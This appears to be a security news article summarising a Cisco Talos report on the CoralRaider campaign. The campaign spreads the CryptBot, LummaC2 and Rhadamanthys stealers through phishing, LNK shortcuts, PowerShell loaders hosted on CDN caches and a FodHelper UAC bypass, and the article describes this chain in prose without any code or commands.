Since at least February 2024, a new, ongoing CoralRaider malware campaign has been distributing three distinct stealers—CryptBot, LummaC2, and Rhadamanthys. These malicious programs have been identified as hosted on Content Delivery Network (CDN) cache sites.

With a reasonable degree of confidence, Cisco Talos has linked this behaviour to a threat actor known as CoralRaider. This group, suspected to be of Vietnamese origin, emerged earlier this month.

 

According to the business, this evaluation takes into account “several overlaps in tactics, techniques, and procedures (TTPs) of CoralRaider’s Rotbot campaign, including the initial attack vector of the Windows Shortcut file, intermediate PowerShell decryptor and payload download scripts, and the FoDHelper technique used to bypass User Access Controls (UAC) of the victim machine.”

The campaign’s targets encompass a wide range of countries and business verticals, including the United States, Nigeria, Pakistan, Ecuador, Germany, Egypt, the United Kingdom, Poland, the Philippines, Norway, Japan, Syria, Turkey, and various other geographical areas.

Attack chains heighten the risk of a widespread attack by enticing users to download files disguised as movie files through a web browser.

According to Talos researchers Joey Chen, Chetan Raghuprasad, and Alex Karkins, “this threat actor is using a Content Delivery Network (CDN) cache to store the malicious files on their network edge host in this campaign, avoiding request delay.” “The actor is using the CDN cache as a download server to deceive network defenders.”

Phishing emails are believed to have served as the initial access point for the drive-by downloads. These emails disseminated booby-trapped URLs leading to ZIP archives containing Windows shortcut files (LNK files).

Once the shortcut file executes, a PowerShell script retrieves an HTML application (HTA) payload stored on the CDN cache. Subsequently, the embedded PowerShell loader executes JavaScript code, initiating a covert operation that culminates in the download and execution of one of the three stealer malware programs.

The modular PowerShell loader script is designed to circumvent User Access Controls (UAC) on the victim’s computer, employing a technique called FodHelper. Vietnamese threat actors have also utilized this method to integrate another stealer known as NodeStealer, which is capable of stealing data from Facebook accounts.

Regardless of the method employed, the stealer virus exfiltrates victims’ data, encompassing bank information, credentials, system and browser data, as well as cryptocurrency wallets.

This effort is notable for utilizing an enhanced version of CryptBot, incorporating additional anti-analysis methods while also harvesting data from authenticator apps and password manager databases.

SOURCE